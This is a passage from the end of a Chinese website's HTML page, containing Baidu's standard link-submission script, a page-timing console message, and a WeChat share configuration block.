            var curProtocol = window.location.protocol.split(':')[0];
            if (curProtocol === 'https') {
                bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
            } else {
                bp.src = 'http://push.zhanzhang.baidu.com/push.js';
            }
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(bp, s);
        })();</script>  <script type="text/javascript">console.log("数据库查询：11次 | 页面生成耗时：2796.46ms");</script> <script type="text/javascript">window.WeChatShareDate = {
        appId: 'wx8c358971b57c3409',
        timestamp: '1739591275',
        nonceStr: 'CxmwkAb9EsHxoFr0',
        signature: '9731b7e1e66b51c6112cdc07f0a1a29864d9d8a2',
        url: 'https://vip.bdziyi.com/2329/',
        title: '',
        img: 'https://oss.bdziyi.com/vip/2024/03/20240324075052980.jpg',
        desc: '',
    }</script> <script type="text/javascript">_win.signin_wx_priority = true;</script> </body></html>